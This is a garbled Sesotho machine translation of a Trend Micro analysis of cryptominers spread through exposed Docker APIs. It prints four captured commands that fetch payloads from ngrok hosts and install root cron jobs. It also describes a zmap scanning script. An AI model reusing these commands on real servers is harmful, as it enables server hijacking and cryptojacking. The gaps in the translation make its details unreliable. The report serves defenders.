Re hlahlobile lintlha tse bokelletsoeng re sebelisa lijana tsa mahe a linotsi, tseo re li entseng ho latela litšokelo. Mme re bone ts'ebetso ea bohlokoa ho tsoa ho basebetsi ba merafong ba sa batloeng kapa ba sa lumelloeng ba li-cryptocurrency ba kentsoeng e le lijana tse mabifi ba sebelisa setšoantšo se phatlalalitsoeng ke sechaba ho Docker Hub. Setšoantšo se sebelisoa e le karolo ea litšebeletso tse fanang ka basebetsi ba merafong ba kotsi ba cryptocurrency.
Ho feta moo, mananeo a ho sebetsa le marang-rang a kentsoe ho kenella ka har'a lijana tse bulehileng tsa boahelani le lits'ebetso.
Re tlohela lipitsa tsa rona tsa mahe a linotsi joalo ka ha li le joalo, ke hore, ka litlhophiso tsa kamehla, ntle le mehato ea ts'ireletso kapa ho kenya software e eketsehileng. Ka kopo elelloa hore Docker e na le likhothaletso tsa ho qala ho qala ho qoba liphoso le bofokoli bo bonolo. Empa lipitsa tsa mahe a linotsi tse sebelisitsoeng ke lijana, tse etselitsoeng ho bona litlhaselo tse lebisitsoeng sethaleng sa li-containeration, eseng lisebelisoa tse ka hare ho lijana.
Ketso e mpe e fumanoeng e boetse ea hlokomeleha hobane ha e hloke bofokoli hape e ikemetse ho mofuta oa Docker. Ho fumana setšoantšo se sa hlophisitsoeng hantle, 'me ka hona se bulehile, setšoantšo sa setshelo ke sona feela seo bahlaseli ba se hlokang ho tšoaetsa li-server tse ngata tse bulehileng.
Docker API e sa koaloang e lumella mosebelisi ho etsa mefuta e mengata e fapaneng ea , ho kenyelletsa ho fumana lethathamo la lijana tse tsamaisang, ho fumana lits'oants'o tse tsoang setshelo se itseng, ho qala, ho emisa (ho kenyeletsoa ho qobelloa) esita le ho theha setshelo se secha ho tloha setšoantšong se itseng se nang le litlhophiso tse boletsoeng.
Ka ho le letšehali ke mokhoa oa ho tsamaisa malware. Ka ho le letona ke tikoloho ea mohlaseli, e lumellang ho ntša litšoantšo ka thōko.
Phatlalatso ea naha ea 3762 Docker APIs e bulehileng. E ipapisitse le patlo ea Shodan ea la 12.02.2019/XNUMX/XNUMX
Tlhaselo ketane le dikgetho payload
Ts'ebetso e mpe e ile ea bonoa eseng feela ka thuso ea lipitsa tsa mahe a linotsi. Lintlha tse tsoang ho Shodan li bonts'a hore palo ea li-API tsa Docker tse pepesitsoeng (bona kerafo ea bobeli) e eketsehile ho tloha ha re batlisisa setshelo se sa sebetseng hantle se sebelisoang e le borokho ho tsamaisa software ea morafo ea Monero cryptocurrency. Ka Mphalane selemong se fetileng (2018, data ea hajoale hoo e ka bang. mofetoleli) ho ne ho e-na le li-API tse bulehileng tse 856 feela.
Tlhahlobo ea likutu tsa pitsa ea mahe a linotsi e bontšitse hore ts'ebeliso ea setšoantšo sa sets'oants'o se ne se amahanngoa le ts'ebeliso ea , sesebelisoa sa ho theha likhokahano tse sireletsehileng kapa ho fetisa sephethephethe ho tloha libakeng tseo batho ba ka fihlang ho tsona ho ea ho liaterese tse itseng kapa lisebelisoa (mohlala, localhost). Sena se lumella bahlaseli hore ba thehe li-URL ka matla ha ba isa mojaro oa moputso ho seva e bulehileng. Ka tlase ke mehlala ea likhoutu ho tsoa litsing tse bonts'ang tlhekefetso ea ts'ebeletso ea ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Joalokaha u bona, lifaele tse kentsoeng li jarolloa ho tsoa ho li-URL tse lulang li fetoha. Li-URL tsena li na le nako e khuts'oane ea ho felloa ke nako, kahoo litefiso tse ngata li ke ke tsa khoasolla kamora letsatsi la ho felloa ke nako.
Ho na le likhetho tse peli tsa phallo ea moputso. Ea pele ke ELF miner e hlophisitsoeng bakeng sa Linux (e hlalosoang e le Coinminer.SH.MALXMR.ATNO) e kopanyang letamo la merafo. Ea bobeli ke script (TrojanSpy.SH.ZNETMAP.A) e etselitsoeng ho fumana lisebelisoa tse itseng tsa marang-rang tse sebelisetsoang ho hlahloba mefuta ea marang-rang ebe joale ho batla liphofu tse ncha.
Script ea dropper e beha mefuta e 'meli e fapaneng, eo ka nako eo e sebelisetsoang ho tsamaisa morafo oa cryptocurrency. Phapang ea HOST e na le URL moo lifaele tse kotsi li leng teng, 'me RIP e feto-fetoha ke lebitso la faele (ha e le hantle, hash) ea morafo e lokelang ho sebelisoa. Phapang ea HOST e fetoha nako le nako ha phetoho ea hash e fetoha. Script e boetse e leka ho hlahloba hore ha ho na basebetsi ba merafong ba li-cryptocurrency ba sebetsang ho seva se hlasetsoeng.
Mehlala ea mefuta e fapaneng ea HOST le RIP, hammoho le snippet ea khoutu e sebelisetsoang ho hlahloba hore na ha ho basebetsi ba merafong ba sebetsang.
Pele o qala mosebetsi oa morafo, o reha lebitso la nginx. Liphetolelo tse ling tsa sengoloa sena li reha morafo ho lits'ebeletso tse ling tse molaong tse ka bang teng libakeng tsa Linux. Hangata sena se lekane ho feta licheke khahlano le lenane la lits'ebetso tse sebetsang.
Mongolo oa ho batla o boetse o na le likarolo. E sebetsa le ts'ebeletso e tšoanang ea URL ho tsamaisa lisebelisoa tse hlokahalang. Har'a tsona ke binary ea zmap, e sebelisetsoang ho hlahloba marang-rang le ho fumana lethathamo la likou tse bulehileng. Script e boetse e jara binary e 'ngoe e sebelisetsoang ho sebelisana le litšebeletso tse fumanoeng le ho amohela li-banner ho tsona ho fumana boitsebiso bo eketsehileng mabapi le tšebeletso e fumanoeng (mohlala, phetolelo ea eona).
Mongolo o boetse o rera esale pele mefuta e meng ea marang-rang e lokelang ho hlahlojoa, empa sena se ipapisitse le mofuta oa mongolo. E boetse e beha likou tse shebiloeng ho tsoa lits'ebeletso - ntlheng ena, Docker - pele e sebelisa skena.
Hang ha liphofu tse ka khonehang li fumanoa, li-banner li tlosoa ho tsona. Sengoliloeng se boetse se sefa lipehelo ho latela lits'ebeletso, lits'ebetso, likarolo kapa sethala se khahlisang: Redis, Jenkins, Drupal, MODX, , moreki oa Docker 1.16 le Apache CouchDB. Haeba seva e hlahlobiloeng e tšoana le e 'ngoe ea tsona, e bolokiloe faeleng ea mongolo, eo bahlaseli ba ka e sebelisang hamorao bakeng sa tlhahlobo e latelang le ho qhekella. Lifaele tsena tsa mongolo li kentsoe ho li-server tsa bahlaseli ka lihokelo tse matla. Ke hore, URL e arohaneng e sebelisoa bakeng sa faele ka 'ngoe, ho bolelang hore ho fihlella ho latelang ho thata.
Vector ea tlhaselo ke setšoantšo sa Docker, joalo ka ha se bonoa likotong tse peli tse latelang tsa khoutu.
Ka holimo ke ho reha lebitso la ts'ebeletso e molaong, 'me ka tlase ke hore na zmap e sebelisoa joang ho skena marang-rang.
Ka holimo ho na le marang-rang a boletsoeng esale pele, ka tlase ho na le likou tse khethehileng tsa ho batla lits'ebeletso, ho kenyeletsoa Docker
Setšoantšo sa skrini se bontša hore setšoantšo sa alpine-curl se jarollotsoe makhetlo a fetang limilione tse 10
E ipapisitse le Alpine Linux le curl, sesebelisoa sa CLI se sebetsang hantle bakeng sa ho fetisa lifaele ka liprothokholo tse fapaneng, o ka li haha . Joalokaha u bona setšoantšong se fetileng, setšoantšo sena se se se kopitsoe makhetlo a fetang limilione tse 10. Palo e kholo ea ho khoasolla e ka bolela ho sebelisa setšoantšo sena joalo ka sebaka sa ho kena; setšoantšo sena se ntlafalitsoe likhoeling tse fetang tse tšeletseng tse fetileng; basebelisi ha ba ka ba khoasolla litšoantšo tse ling polokelong ena hangata. Ka Docker - lethathamo la litaelo tse sebelisoang ho hlophisa setshelo ho se tsamaisa. Haeba li-setting tsa ho kena li fosahetse (mohlala, setshelo se siiloe se butsoe ho tsoa Inthaneteng), setšoantšo se ka sebelisoa e le vector ea tlhaselo. Bahlaseli ba ka e sebelisa ho fana ka phalliso haeba ba fumana setshelo se sa sebetseng hantle kapa se bulehileng se sa tšehetsoa.
Ke habohlokoa ho hlokomela hore setšoantšo sena (alpine-curl) ka boeona ha se kotsi, empa joalokaha u ka bona ka holimo, se ka sebelisoa ho etsa mesebetsi e kotsi. Litšoantšo tse tšoanang tsa Docker le tsona li ka sebelisoa ho etsa liketso tse mpe. Re ile ra ikopanya le Docker mme ra sebetsa le bona tabeng ena.
likhothaletso
mesaletsa bakeng sa lik'hamphani tse ngata, haholo-holo tse kenyang ts'ebetsong , e tsepamisitse maikutlo ho nts'etsopele le phano e potlakileng. Ntho e 'ngoe le e' ngoe e mpefatsoa ke tlhokahalo ea ho lumellana le melao ea tlhahlobo ea lichelete le ho beha leihlo, tlhokahalo ea ho beha leihlo lekunutu la data, hammoho le tšenyo e khōlō ea ho se latele melao ea bona. Ho kenyelletsa boiketsetso ba ts'ireletso molemong oa nts'etsopele ha ho u thuse feela ho fumana masoba a ts'ireletso a ka 'nang a se ke a bonoa, empa hape ho u thusa ho fokotsa mosebetsi o sa hlokahaleng, joalo ka ho tsamaisa lisebelisoa tse ling tsa software bakeng sa ts'oaetso e' ngoe le e 'ngoe e fumanoeng kapa tlhophiso e fosahetseng ka mor'a hore kopo e sebelisoe.
Ketsahalo e tšohliloeng sehloohong sena e totobatsa tlhokahalo ea ho nahanela tšireletseho ho tloha qalong, ho akarelletsa le litlhahiso tse latelang:
- Bakeng sa batsamaisi ba sistimi le ba ntlafatsang: Kamehla hlahloba litlhophiso tsa API ea hau ho etsa bonnete ba hore ntho e ngoe le e ngoe e lokiselitsoe ho amohela likopo tse tsoang ho seva e itseng kapa marang-rang a ka hare.
- Latela molao-motheo oa litokelo tse fokolang: etsa bonnete ba hore litšoantšo tsa setshelo li saennoe le ho netefatsoa, fokotsa phihlello ea likarolo tsa bohlokoa (ts'ebeletso ea ho qala setshelo) 'me u kenye encryption ho likhokahano tsa marang-rang.
- Latela le ho nolofalletsa mekhoa ea tšireletso, mohlala. le e hahiloeng .
- Sebelisa mokhoa o itirisang oa ho hlahloba linako le litšoantšo ho fumana lintlha tse ling mabapi le lits'ebetso tse sebetsang ka har'a sets'oants'o (mohlala, ho bona bofokoli kapa ho batla bofokoli). Taolo ea ts'ebeliso le ho lekola bots'epehi li thusa ho latela liphetoho tse sa tloaelehang ho li-server, lifaele le libaka tsa sistimi.
Trendmicro e thusa lihlopha tsa DevOps hore li hahe li sireletsehile, li phatlalatse kapele, 'me li qala kae kapa kae. Trend Micro E fana ka ts'ireletso e matla, e hlophisitsoeng, le e ikemetseng ho pholletsa le lipeipi tsa DevOps tsa mokhatlo mme e fana ka ts'ireletso e mengata ea litšokelo. ho sireletsa mesebetsi ea 'mele, ea sebele le ea maru ka nako ea ho sebetsa. E boetse e eketsa tshireletso ya setshelo ka и , e hlahlobang litšoantšo tsa setshelo sa Docker bakeng sa malware le bofokoli nako efe kapa efe ea lipeipi tsa nts'etsopele ho thibela litšokelo pele li ka romelloa.
Matšoao a ho sekisetsa
Li-hashe tse amanang:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
mabapi le Libui tse ikatisetsang li bontša hore na ke litlhophiso life tse lokelang ho etsoa pele e le ho fokotsa monyetla kapa ho qoba ka ho feletseng ho etsahala ha boemo bo hlalositsoeng ka holimo. Mme ka Phato 19-21 sebakeng se matla sa marang-rang U ka buisana ka mathata ana le a tšoanang a ts'ireletso le basebetsi-'moho le basebetsi-'moho le matichere a itloaetsang tafoleng e pota-potileng, moo bohle ba ka buang le ho mamela bohloko le katleho ea basebetsi-'moho le bona ba nang le phihlelo.
Source: www.habr.com